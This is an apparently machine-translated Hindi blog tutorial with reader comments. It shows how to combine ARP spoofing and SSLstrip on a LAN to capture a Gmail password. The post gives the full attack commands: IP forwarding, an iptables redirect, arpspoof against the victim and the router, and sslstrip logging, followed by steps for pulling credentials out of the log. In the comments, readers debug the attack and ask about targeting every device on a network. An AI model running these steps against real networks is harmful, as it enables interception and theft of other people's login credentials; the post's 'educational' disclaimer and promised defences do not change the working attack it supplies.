लड़ाई में ArpSpoofing और SSlstrip।

नमस्कार ब्लॉगर्स।

आज के लिए मेरे पास इस बात का एक छोटा सा नमूना है कि बिना किसी सुरक्षा के किसी भी नेटवर्क में जुड़ा जाना कितना खतरनाक हो सकता है, जो हममें से कई लोग पसंद करते हैं।

आज के लिए, मैं Gmail पासवर्ड प्राप्त करने के लिए Sslstrip के साथ ArpSpoofing का उपयोग करने जा रहा हूं। पर्यावरण को अधिक नियंत्रित करने के लिए, मैंने एक खाता बनाया है जिसे "testarp@gmail.com".

और चूंकि मुझे प्रस्तावना बहुत पसंद नहीं है, इसलिए व्यापार के लिए नीचे उतरें।

निम्नलिखित जानकारी के साथ वे क्या कर सकते हैं, इसके लिए मैं किसी भी समय जिम्मेदार नहीं हूं। मैं इसे विशेष रूप से शैक्षिक उद्देश्यों के लिए करता हूं

वातावरण

इस परीक्षण के लिए हमारे पास निम्नलिखित हैं:

1. हमलावर: यह मेरा डेस्कटॉप या डेस्कटॉप कंप्यूटर है जिसमें डेबियन व्हीज़ी है। रिपॉजिटरी से आप इंस्टॉल कर सकते हैं एसएसएलस्ट्रिप y डीएसएनिफ पाने के लिए आर्सेपोफिंग

2. पीड़ित: पीड़ित एक एंड्रॉइड टैबलेट है जो केवल ब्राउज़र के माध्यम से अपना मेल देखना चाहता है।

3. माध्यम: बीच मेरा है सिस्को DPC2425 राउटर

ADDRESSES।

हमलावर का पता: 172.26.0.2

राउटर का पता: 172.26.0.1

पीड़ित का पता: 172.26.0.8

हमला:

थोड़ा और समझने के लिए कि हमला कैसे काम करता है, आप मेरे पुराने पर जा सकते हैं पोस्ट

इस हमले के लिए हम पहली चीज यह करेंगे कि हम आगे सक्रिय हो जाएं ताकि हमारा कंप्यूटर पीड़ित को बिना उसकी जानकारी के आगे की सूचना दे सके। (अन्यथा यह सेवाओं के हमले से इनकार होगा)

उसके लिए हम उपयोग करेंगे:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

डायरेक्ट कंसोल विंडो में प्रत्येक कमांड।

अब अगर हम टेल-एफ करते हैं desdelinux हम जानकारी को लाइव और प्रत्यक्ष देखते हैं

स्नैपशॉट 1

तो फिर हम जो चाहते हैं वह कैसे मिलता है?

आइए सबसे पहले टेबलेट पर अपना मेल डालें। लॉग इन करते समय, हम देखते हैं कि हजारों और हजारों चीजें हमारे कंसोल पर दिखाई देती हैं।

अब जब यह समाप्त हो गया है तो आइए अपनी फ़ाइल खोलें ”desdelinuxनैनो के साथ

nano desdelinux

नियंत्रण + डब्ल्यू के साथ हम SECURE POST नामक कुछ खोजते हैं।

और हम कुछ इस तरह देखेंगे।

स्नैपशॉट 2

उस विशाल रेखा के बीच जिसे देखा नहीं जा सकता है, वह पीड़ित का ईमेल और पासवर्ड है।

इसलिए हम दाईं ओर भागते हैं जब तक हम अंत में सुरंग के अंत में प्रकाश को नहीं देखते हैं।

स्नैपशॉट 3

एक अन्य अवसर पर हम देखेंगे कि हम इन हमलों से खुद को कैसे बचा सकते हैं।

सादर


अपनी टिप्पणी दर्ज करें

आपका ईमेल पता प्रकाशित नहीं किया जाएगा। आवश्यक फ़ील्ड के साथ चिह्नित कर रहे हैं *

*

*

  1. डेटा के लिए जिम्मेदार: मिगुएल elngel Gatón
  2. डेटा का उद्देश्य: नियंत्रण स्पैम, टिप्पणी प्रबंधन।
  3. वैधता: आपकी सहमति
  4. डेटा का संचार: डेटा को कानूनी बाध्यता को छोड़कर तीसरे पक्ष को संचार नहीं किया जाएगा।
  5. डेटा संग्रहण: ऑकेंटस नेटवर्क्स (EU) द्वारा होस्ट किया गया डेटाबेस
  6. अधिकार: किसी भी समय आप अपनी जानकारी को सीमित, पुनर्प्राप्त और हटा सकते हैं।

  1.   @ जैल्क्सक्स कहा

    मैं यह कहने का अवसर लेता हूं कि जब पोस्ट प्रकाशित किया गया था, तो आदेश सही नहीं थे।

    अंत में iptables कमांड 8080 को याद कर रहा है जो दूसरी लाइन पर है। और फिर arpspoof कमांड सभी एक ही लाइन पर थे। प्रत्येक कमांड एक अलग लाइन पर है।

    उम्मीद है कि संपादक इसे देखता है और इसे ठीक कर सकता है।

    नमस्ते.

    1.    मैनुअल डे ला फूएंते कहा

      मैंने आपके द्वारा किए गए सुधार किए हैं, क्या यह ठीक है?

      यदि आप किसी पसंदीदा प्रविष्टि में कोड सम्मिलित करने जा रहे हैं, तो HTML दृश्य का उपयोग करें, और सत्यापित करें कि लंबित भेजने से पहले लेख सही है। धन्यवाद।

  2.   लुइस कहा

    यह जानना बहुत कठिन है कि हममें से जिन्हें कोई ज्ञान नहीं है, वे इतने कमजोर हैं। बहुत अच्छी जानकारी तब भी जब मैं उस विषय को बहुत कम समझता हूं जिसका मुझे महत्व है। धन्यवाद!
    सादर

  3.   गिस्कार्ड कहा

    लेकिन यह तभी काम करता है जब हमलावर और पीड़ित एक ही नेटवर्क पर हों। किसी भी स्थिति में, मुझे यह प्रतीत होता है कि यदि (उसी नेटवर्क पर) आप HTTPS का उपयोग करके कनेक्ट होते हैं जो कि नहीं होता है क्योंकि डेटा को आपके मशीन से बाहर जाने से पहले एन्क्रिप्ट किया गया है। यदि आप HTTP (S के बिना) से जुड़ते हैं, तो मुझे लगता है कि नेटवर्क केबल को देखते हुए भी आप चाबियाँ देखते हैं।

    1.    @ जैल्क्सक्स कहा

      यह सच नहीं है। मैं एक gmail पासवर्ड हैक कर रहा हूँ और अगर आप gmail नोटिस करते हैं तो वह https का उपयोग करता है। इसलिए? मुद्दा यह है कि हालांकि https सुरक्षित है, यह http पर निर्भर करता है। इसलिए यह इतना सुरक्षित नहीं है।

      किसी https के बारे में इतना मत मानिए कि S सुपरमैन के लिए नहीं है, यह "सुरक्षित" के लिए है

    2.    आरटीएन कहा

      यह https के साथ या इसके बिना काम करता है, मैंने इसे एक अधिक विशिष्ट linux distro के साथ आज़माया है और यह बिना किसी समस्या के काम करता है

    3.    मैनुअल डे ला फूएंते कहा

      आप इसका उपयोग उन लोगों को सबक सिखाने के लिए कर सकते हैं जो आपका वाई-फाई चोरी करते हैं। 😀

      यह कमोबेश वैसा ही है जैसा कि उन्होंने बहुत पहले चेमा अलोंसो के ब्लॉग पर कहा था:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    रेयोनेंट कहा

        ओस्टिया, यह क्या करता है महान! / और फिर वे हर बार जब मैं बैंक खाते की जांच करने के लिए जाते हैं तो मैं वीपीएन का उपयोग करता हूं।))। वैसे, आपको देखना होगा कि टिप्पणी में निंदक कैसे हैं ... अगर अंत में यह चोरी कर रहा है ...

        1.    एलियोटाइम३००० कहा

          अब हमें अपनी स्वयं की वीपीएन सेवा बनाने और पेश करने के तरीके के बारे में एक ट्यूटोरियल लेने की आवश्यकता है।

      2.    डैनियल कहा

        आपके द्वारा लिंक की गई कहानी बहुत ही रोचक है, यहां तक ​​कि यह एक उपन्यास पुस्तक के योग्य है, और यह मुझे याद है जब मैंने अपने पड़ोसियों के इंटरनेट का उपयोग किया था और हालांकि मैं कहता हूं कि मैं इस विषय को जानता हूं, मुझे लगता है कि मैं कभी भी सही आयाम नहीं देख सकता। मेरे लिए सौभाग्य से जो खतरा हो सकता था, उन्होंने केवल WPA2 का पासवर्ड बदल दिया और यहीं से ISP के साथ मेरी कहानी शुरू हुई

    4.    मॉरिशस कहा

      इसलिए शीर्षक एक्शन में Sllstrip का कहना है।

      यह तब तक काम करता है, जब तक हमलावर बीच में है

  4.   अभी कहा

    आप प्रिज्म में किस तरंग पर काम करते हैं? -
    नं.
    आप अपना अनुरोध XD भेजने के लिए क्या इंतजार कर रहे हैं
    का संबंध है
    अच्छी पोस्ट

  5.   ऑरोज़्ज़क्स कहा

    दिलचस्प है, मैं बाद में एक शैक्षिक परीक्षण करूँगा ... शायद मैं भी वाईफाई को पासवर्ड हटा सकता हूं और थोड़ा educational के लिए मज़े कर सकता हूं
    किसी भी तरह से, क्या आप अनुरोध किए गए लक्ष्य के लिए अलग-अलग पृष्ठ भेजने के लिए कुछ ऐसा ही कर सकते हैं? उदाहरण के लिए, वे फेसबुक खोलना चाहते हैं और मैं उन्हें Google पर पुनर्निर्देशित करूं? 😛

    1.    @ जैल्क्सक्स कहा

      हाँ। लेकिन यह सब बहुत अलग रोल है।

      शायद बाद में पोस्ट कर दूंगा।

  6.   अंतिम कहा

    बहुत अच्छी पोस्ट, ये विषय बहुत ही शैक्षिक हैं, अब हमें इस हमले का मुकाबला करने में सक्षम होने की आवश्यकता है, क्योंकि कुछ (जैसे मैं) सार्वजनिक नेटवर्क (उदाहरण के लिए विश्वविद्यालय) से जुड़ते हैं, इससे बचने में मदद मिलेगी।

    नमस्ते!

  7.   बस एक और- dl-user कहा

    यह मेरे लिए काम नहीं किया 🙁

  8.   वोकर कहा

    मुझे यहां कुछ भी विफल हो जाता है, इस तथ्य के अलावा कि सर्वर कनेक्शन के माध्यम से https कनेक्शन एन्क्रिप्ट किए जाते हैं (एक बार आपके मशीन पर प्रमाण पत्र होने के बाद, आपका ब्राउज़र एन्क्रिप्शन का प्रभारी है) iptables के साथ आप पोर्ट 80 (http) को पुनर्निर्देशित करते हैं, न कि 443 जो कि https है

    1.    @ जैल्क्सक्स कहा

      मैंने भी यही सोचा था। मुद्दा यह है कि हालांकि https "सुरक्षित" है यह दुर्भाग्य से http पर निर्भर करता है। तो sslstrip इसका लाभ उठाता है, यह ब्राउज़र को विश्वास दिलाता है कि यह https क्रेडेंशियल्स का उपयोग कर रहा है लेकिन ऐसा नहीं है।

      1.    वोकर कहा

        पवित्र बकवास! लेकिन ब्राउज़र को एक चेतावनी देखनी चाहिए जैसे "यह प्रमाणपत्र एक संदिग्ध साइट से आता है या ऐसा कुछ" "... मुझे निश्चित रूप से परीक्षण करना होगा XD

        1.    @ जैल्क्सक्स कहा

          नहीं, बिल्कुल कुछ भी नहीं निकलता है।

  9.   बस एक और- dl-user कहा

    यह आखिरकार मेरे लिए काम कर गया
    मैं पासवर्ड के साथ एक WEP नेटवर्क पर जुड़ा हुआ हूं, और इसने मुझे सीधे वैसे भी पासवर्ड दिखाया।

    एक प्रश्न। क्या आप एक ही प्रक्रिया कर सकते हैं लेकिन सभी कंप्यूटरों के लिए जो नेटवर्क में जुड़े हुए हैं, बजाय एक ही शिकार के?

    1.    @ जैल्क्सक्स कहा

      हाँ आप कर सकते हैं। लेकिन मैंने प्रयोग नहीं किए हैं। इसे स्वयं आज़माएं और हमें बताएं कि आप कैसे कर रहे हैं।

  10.   सिननिक १ ९ कहा

    इसके साथ केवल एक चीज यह है कि पीड़ित की मशीन ऑफ़लाइन हो जाती है, लेकिन sslstrip मुझे कुछ भी नहीं दिखाता है: /

    1.    @ जैल्क्सक्स कहा

      आपको एक पल के लिए फ़ायरवॉल को अक्षम करना होगा। या कम से कम आने वाले कनेक्शन को सक्षम करें।

  11.   श्री काले कहा

    जांच और मैं केवल फेसबुक पेज का उपयोगकर्ता नाम और पासवर्ड देख सकता था, जीमेल में मुझे लॉग में कोई परिणाम नहीं मिला, मुझे भी केवल arpspoof «arpspoof -i -t« की एक पंक्ति की आवश्यकता थी। दूसरी ओर, पीड़ित मशीन कुछ पृष्ठ नहीं खोल सकी। मैं जांच जारी रखूंगा, यह बहुत दिलचस्प है। मंज़रो का उपयोग करने वालों के लिए एक सहायता, स्थापित करने के लिए पैकेज हैं: dsniff (यहाँ arpspoff), मुड़ और python2-pyopenssl। Sslstrip को यहाँ से डाउनलोड किया जा सकता है: http://www.thoughtcrime.org/software/sslstrip/
    इसे चलाने के लिए $ python2 sslstrip.py
    नमस्ते.

  12.   श्री काले कहा

    यह बाहर नहीं आया लेकिन arpspoof लाइन है: #arpspoof -i int -t ip-पीड़ित आईपी-राउटर

  13.   गिल्बर्ट कहा

    देखो मैं वही करता हूँ जो तुम कहते हो:

    इको "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT –to-port 8080

    आर्स्पूफ -आई एथ0 -टी 172.26.0.8 172.26.0.1
    आर्स्पूफ -आई एथ0 -टी 172.26.0.1 172.26.0.2

    समस्या यह है कि पीड़ित जो एक और पीसी है जो मैं अपने कमरे में यहां रखता हूं, मेरे पास उस बिंदु से कोई संबंध नहीं है जो मुझे राउटर को पुनरारंभ करना है, मैं क्या कर सकता हूं।

    एक और बात मैं एक वर्चुअल मशीन के साथ काम कर रहा हूं, और जब मैं iwconfig कमांड निष्पादित करता हूं, तो wlan0 प्रकट नहीं होता है, और न ही जब मैं ifconfig निष्पादित करता हूं, हालांकि अगर मेरे पास अपने वर्चुअल मशीन पर इंटरनेट है तो एक eth0 इंटरफ़ेस क्या है।